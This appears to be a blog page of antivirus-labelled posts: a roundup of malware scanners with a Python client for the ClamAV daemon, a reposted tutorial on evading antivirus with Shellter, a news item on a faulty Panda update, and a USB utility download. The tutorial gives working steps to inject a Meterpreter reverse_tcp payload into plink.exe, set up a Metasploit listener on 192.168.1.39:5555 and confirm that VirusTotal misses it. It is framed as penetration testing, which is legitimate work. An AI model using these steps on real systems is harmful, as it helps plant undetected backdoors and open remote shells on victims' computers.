Showing posts with label Antivirus. Show all posts

5 Malware Scanners You Should Know About

For many years computers have been infected by malicious software, also known as “malware”. It is specially designed to gain access to, or damage, a computer without the owner's knowledge. To protect users from such damage, various anti-malware programs have been developed.


Today we are going to discuss a few of the best-known anti-malware programs that can be used to protect ourselves.

MalwareBytes’ Anti-Malware

MalwareBytes is a Windows-based anti-malware program. It scans Windows for malicious software. A free version with limited features is available online; scheduled scans are supported in the paid version. The author of MalwareBytes claims it detects malware that other anti-malware scanners leave undetected.


ClamAV

ClamAV is the most powerful open source malware scanner; it integrates with mail servers and scans attached files for malware. It provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool to update signatures over the Internet. Clam AntiVirus is built on a shared library and ships an up-to-date virus database that you can use from your own software.
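As an added example (not code from this page or from the ClamAV project), here is a small Python client for the clamd daemon's INSTREAM command, which is how a mail gateway hands an attachment to ClamAV without writing it to disk. It assumes clamd listening on TCP 127.0.0.1:3310 (host, port and chunk size are assumptions to match your clamd.conf) and the framing described in the clamd(8) manual.

```python
import socket
import struct

# Connection defaults (assumptions; match TCPAddr/TCPSocket in your clamd.conf)
CLAMD_HOST = "127.0.0.1"
CLAMD_PORT = 3310
CHUNK_SIZE = 8192


def frame_instream(data, chunk_size=CHUNK_SIZE):
    """Build the bytes of a clamd INSTREAM request.

    'z' selects NUL-terminated commands and replies. The file body follows
    as chunks, each prefixed by a 4-byte big-endian length; a zero-length
    chunk ends the stream. clamd never sees a filename, so a mail filter
    can scan an attachment this way without writing it to disk.
    """
    parts = [b"zINSTREAM\0"]
    for i in range(0, len(data), chunk_size):
        chunk = data[i:i + chunk_size]
        parts.append(struct.pack("!I", len(chunk)) + chunk)
    parts.append(struct.pack("!I", 0))  # terminating zero-length chunk
    return b"".join(parts)


def parse_reply(reply):
    """Map a reply such as b'stream: Eicar-Test-Signature FOUND' to
    (status, detail) where status is 'OK', 'FOUND' or 'ERROR'."""
    text = reply.rstrip(b"\0").decode("utf-8", "replace").strip()
    verdict = text.partition(": ")[2] or text  # drop the 'stream: ' prefix
    if verdict == "OK":
        return "OK", None
    if verdict.endswith(" FOUND"):
        return "FOUND", verdict[:-len(" FOUND")]
    # e.g. "INSTREAM size limit exceeded. ERROR": report a scan failure,
    # not a clean result, so the caller can fail closed.
    return "ERROR", verdict


def scan_bytes(data, host=CLAMD_HOST, port=CLAMD_PORT, timeout=30):
    """Stream an in-memory file to clamd and return (status, detail)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(frame_instream(data))
        reply = b""
        while not reply.endswith(b"\0"):
            part = sock.recv(4096)
            if not part:
                break
            reply += part
    return parse_reply(reply)
```

The ERROR branch deliberately returns a non-clean status: a scan that failed (for example on the stream size limit) should be treated as undetermined rather than as OK.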


VirusTotal

VirusTotal is a web-based anti-malware scanner that analyzes submitted files for known viruses and malware. It aggregates many antivirus engines from different vendors and is updated regularly with new signatures. It also alerts antivirus vendors when a submitted file is not detected by their product.


SUPERAntiSpyware

SuperAntiSpyware is the best portable malware scanner: it runs directly from any USB drive without installation, which matters on a heavily infected computer where installing software can be a problem. The latest version can be downloaded directly from the Internet, which saves the trouble and time of updating the software. The free version of SuperAntiSpyware does not include real-time protection or update features.


EMCO Malware Destroyer

EMCO Malware Destroyer is a malware scanning management tool that batch-scans multiple computers on a network for malware, without real-time protection. EMCO's free version provides only one scanning mode and allows scanning of a single local or remote computer. It is quite fast because it checks for infection against targeted definitions.



Many cyber security professionals and individuals use these tools to scan for malicious software. There are many other scanners as well.

~ Sunday 26 June 2016, 1 comment

Bypass an Anti-Virus with Shellter on Kali Linux

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program!

The latest version of Shellter for pentesters was revealed at B-Sides Lisbon earlier this month. Updates include increased obfuscation through a custom encoder and polymorphic decoder. This version also saves a few steps by including the most common Meterpreter shells.

Shellter works by taking a legitimate Windows .exe file, adding the shellcode to it, and then doing a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very painless. In this tutorial I used the latest version of Kali Linux and a Windows 7 virtual machine.
So enough talk, let’s see it in action!

1. Download and install “shellter” (https://www.shellterproject.com/download/ )

Note: the Kali repos apparently don’t contain the newest 4.0 version yet. To get the latest, instead of using ‘apt-get install shellter’, just download and extract the ZIP file to the “/etc/share” folder.

2. Grab “plink.exe” from Kali’s ‘/usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Start Shellter – ‘shellter’ from the terminal, or use ‘wineconsole shellter’ from ‘/etc/share/shellter’ if you installed it manually.



4. Choose ‘A’ for Automatic Mode
5. At the PE Target prompt, enter “plink.exe”
6. When prompted for Payloads select “L” and then “1”



7. Next, enter the IP address of your Kali system (mine is 192.168.1.39)
8. And the port to use (I used 5555)


Shellter will obfuscate the code and crunch for a while. Then you should see:


Success!

9. Now we need to start a listener service on the Kali system using the same settings from above:

• start Metasploit (‘msfconsole’ in a terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
• exploit

10. Now that Kali is waiting for a connection, copy our evil plink.exe to the Windows 7 system and run it:

And we have a shell!


Compare the size of the backdoored exe to the original one. They are the exact same size! Now upload the backdoored exe to Virustotal and scan it for malicious content:



One (!) anti-virus engine detected it as malicious. And it was not a mainstream AV normally found in companies…

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great, but it can’t stop everything; you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything, and never open unsolicited or suspicious attachments in e-mails. If you don’t know whether you should click on something, ask your IT department. A little user vigilance can go a long way towards protecting your network!

The Author:
This wonderful tutorial has been written and first published by Cyberarms.

~ Saturday 18 July 2015, 0 comments

Panda antivirus turned itself into a malware and obstructed PCs

Panda users faced a difficult situation when the Spanish security software firm shipped an update that classified components of its own technology as malicious. An update to a number of Panda antivirus programs on Wednesday mistakenly flagged key files as malware and quarantined them. As a result, the antivirus stopped working.





Consequently, enterprise PCs running the antivirus software became stuck, leaving some systems either unprotected or unable to access the Internet. A Panda spokesman confirmed the problem while advising that the issue was well in hand.


"A bad update was published temporarily today [Wednesday] that resulted in some system files being detected by the Panda engine, a replacement update was promptly published removing the error and restoring the wrongly quarantined files," a Panda representative told El Reg.  

He further added, "At present we recommend NOT rebooting systems. This will allow us to update the system with the amended update. This update will also restore files previously detected."

Panda's free antivirus, its retail 2015 product, and its enterprise cloud-based antimalware service are all affected. However, it is not clear how many machines were affected.

The company has warned the users on Twitter, "Please, Don't reboot PCs. We'll keep you posted."
In an advisory, Panda said the erroneous signature file was "repaired immediately," but warned under certain conditions it is possible for the "incident to persist."

This is not the first time that an antimalware product has erroneously classified key files as malware. In 2010, McAfee accidentally deleted an essential Windows XP file and blocked millions of machines. False positives involving antivirus updates have afflicted all vendors from time to time.
Recently Google-owned VirusTotal partnered with several companies, including Microsoft, to minimize the number of false flags in its antivirus products.

The resulting problems are worst when Windows operating system files are falsely classified as potentially malicious and quarantined, leaving Windows systems unusable. Panda's auto-immune screw-up would have caused similar problems.

~ Thursday 12 March 2015, 0 comments

[SHARE] UiTM USB Manager


UiTM USB Manager
A simple program that lets you unhide all files on your drives, delete shortcuts and hide unnecessary files. You can also format and rename your drive with it. Comes with Safe Mode, which keeps you from accidentally formatting your current drives, such as C:\ or D:\, which contain your files and OS.

Features
- Safe Mode
- Unhide hidden files
- Delete shortcut viruses
- Hide unnecessary files
- Quick Format
- Rename
- Detect if a drive is connected/removed
- Launch at startup

Downloads
UiTM USB Manager (222 KB)

~ Sunday 21 December 2014, 0 comments